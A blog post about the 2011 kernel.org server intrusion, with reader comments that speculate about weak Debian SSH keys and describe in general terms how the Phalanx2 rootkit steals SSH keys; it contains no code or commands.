Attack on Kernel.org

From information published on the web we know:

  1. servers at kernel.org were under the control of intruders until August 28,
  2. the attack lasted more than two weeks and involved Phalanx which snaffles SSH keys,

It is possible that this is an echo of the infamous weak ssh-keys in Debian although Netcraft lists the site as running Fedora. All it would take is a system administrator generating keys on a Debian GNU/Linux system years ago and spreading them around… If the Fedora system did not pick them up, the intruders could have walked in easily.

About Robert Pogson

I am a retired teacher in Canada. I taught in the subject areas where I have worked for almost forty years: maths, physics, chemistry and computers. I love hunting, fishing, picking berries and mushrooms, too.
This entry was posted in technology. Bookmark the permalink.

11 Responses to Attack on Kernel.org

  1. oiaohm says:

    Robert Pogson Yep unobtrusively is not exactly what Phalanx2 is known for.

    Some of Phalanx2 escalation methods are very much like pulling the fire alarm and hoping no one notices.

    Thinking Phalanx2 and Phalanx was designed to demo a fault. /dev/kmem disappeared so rendering Phalanx non operational. Phalanx2 uses /dev/mem This disappears when we can get to KMS as standard.

    twitter all the reports are out on the mailing lists. Linux to Linux rare but annoying. Also it is a good time to do a check of the keys you are using.

    Now the fun part is finding the person who did it. Was it just a script kiddy out for some kicks or someone more evil.

  2. twitter says:

    I will wait and see that someone did not simply give their password to an OSX or Windows keylogger. China worked their way into Google through Windows and this is why Google has banned Windows use. Non free software seems to be the easy route into any place. Reports express surprise that Phalanx was used because it’s a script kiddie tool. It’s like they did not know how to exploit the opportunity they had.

  3. “Trojan initially discovered due to the Xnest /dev/mem error message w/o Xnest installed; have been seen on other systems.” see Kernel.org

    Let me understand your point. You believe that Phalanx2 causes kernel panics as it unobtrusively goes about the business of hiding a rootkit???! –begin sarcasm– Why doesn’t it just trip the fire alarm or something bold to signal its presence? –end sarcasm–

  4. oiaohm says:

    Robert Pogson admin of kernel.org does in one report mention unstable crashing server being investigated on the servers taken off line.

    Phalanx2 are very Linux targeted. In fact is a x86 Linux ELF file with a python assist script(the python script is what nicks the ssh keys).

    kernel.org does not have /dev/mem that is one of the attacks Phalanx2 uses xnest trying to access /dev/mem. Infact kernel.org servers take offense to that being attempted to be accessed so kernel panic.

    So there is a probability that kernel.org was never breached to root level. Due to the set secuirty. Problem is you have to presume the worst.

    Phalanx2 was on the developers machine and the kernel.org server. That is why we can be 100 percent sure it Linux to Linux with a remote machine in the middle. Of course controller of the Phalanx2 could have used any ssh client to upload it into kernel.org and the first breached developer.

    Biggest issue here is Phalanx is open source rootkit solution to attack Linux. So we know the attacker using it could have the source code.

    So this attack scary enough could be just a script kiddy out for a few kicks.

    Phalanx2 bugger<< I was referring to the person controlling it. So you can bet the attacker knew they were hitting kernel.org.

  5. There is no mention of a crash, just some error messages. Presumably Phalanx files could be dropped by any SSH client with a hey for root.

  6. oiaohm says:

    twitter I am sorry to say the infection being Phalanx2 rules out the possibility of windows or OS X. Yes it one of the Linux only infections out there. I know they are rare.

    Yes the developer that was the source of infection with kernel.org reported being breached by it. One of the common ways Phalanx2 gets an entry path into the first system is a weak ssh key generated on a debian system. This could have been a simpler over-site. Yes coders are busy.

    Issue is once it is in the Phalanx2 bugger trees from there infecting as many systems as possible. Yes Phalanx2 is Linux network worst nightmare at times.

    Yes the exact person who was the source to kernel.org is known. This is rare in Windows virus infection cases. Issue we don’t know who was the attacker who got him.

    Robert Pogson key thing to remember about Phalanx2 is that it contains a stack of privilege escapes for Linux. So even if it gets is quite a low user it can dig its way up.

    This dig it way up is what drew attention to it since a kernel.org server was crashing with strange logs.

    Due to the variations in the Phalanx2 privilage excapes that can ship with it. It is wiser to presume root was breached than presume the other way. Particularly if it turns out to be not Phalanx2 but a new form that detects as Phalanx2.

  7. Well, root was accessed. Weak SSH key for root would be the quickest/easiest way to exploit that. No password-guessing required.

  8. twitter says:

    I think it is too early to blame Debian’s weak keys. It is more probable that a developer trusted a weaker OS such as OSX or Windows and the compromise rolled from there. A chain is only as strong as it’s weakest link and, sadly, there are free software developers who have not learned to reject non free software out of hand yet.

  9. Yep. When that issue was revealed I had to scramble to clean up my systems. I did OK except that I had moved on and only had contact with my personal machines and server. I still had backups with the keys appearing years later.

    I depend on openSSH for so much. It is so cool to be able to control a cluster as if they were one machine. It gave me a sick feeling in the stomach when the weak keys were found.

  10. oiaohm says:

    Robert Pogson you missed it. Phalanx2 is a direct descendant of Phalanx and Phalanx was the first major attacker against weak ssh keys.

    Phalanx2 is worse. When it gets into a system it raids the ssh key stores it can gets it hands on. Password or not. It then sends all that information to the attacker.

    The attacker can then attempt to brute force password protected keys.

    So that the main server was not running debian. But what was H Peter Anvin running. Possibly debian due to the fact he is one of the debian maintainers for kernel work.

    This is most likely not an echo but a direct result of that past issue. Just catch up to us now. One old key laying on his system leading to it being breached and it cascading to kernel.org.

    Even so the broken kernel.org really did not put the git repo at risk thinking git is designed to be on a untrusted server and detect someone trying to tamper with it. Question now is what todo about the tar.gz and tar.bz2 archives generated and signed.

    So due to the second layer of git the damage is quite min. Annoying and time consuming. But min.

    My 3 layers systems sound insane until something like this happens near you. 1 layer to auth is just not enough. 1 layer is too simple to steal or breach.

Leave a Reply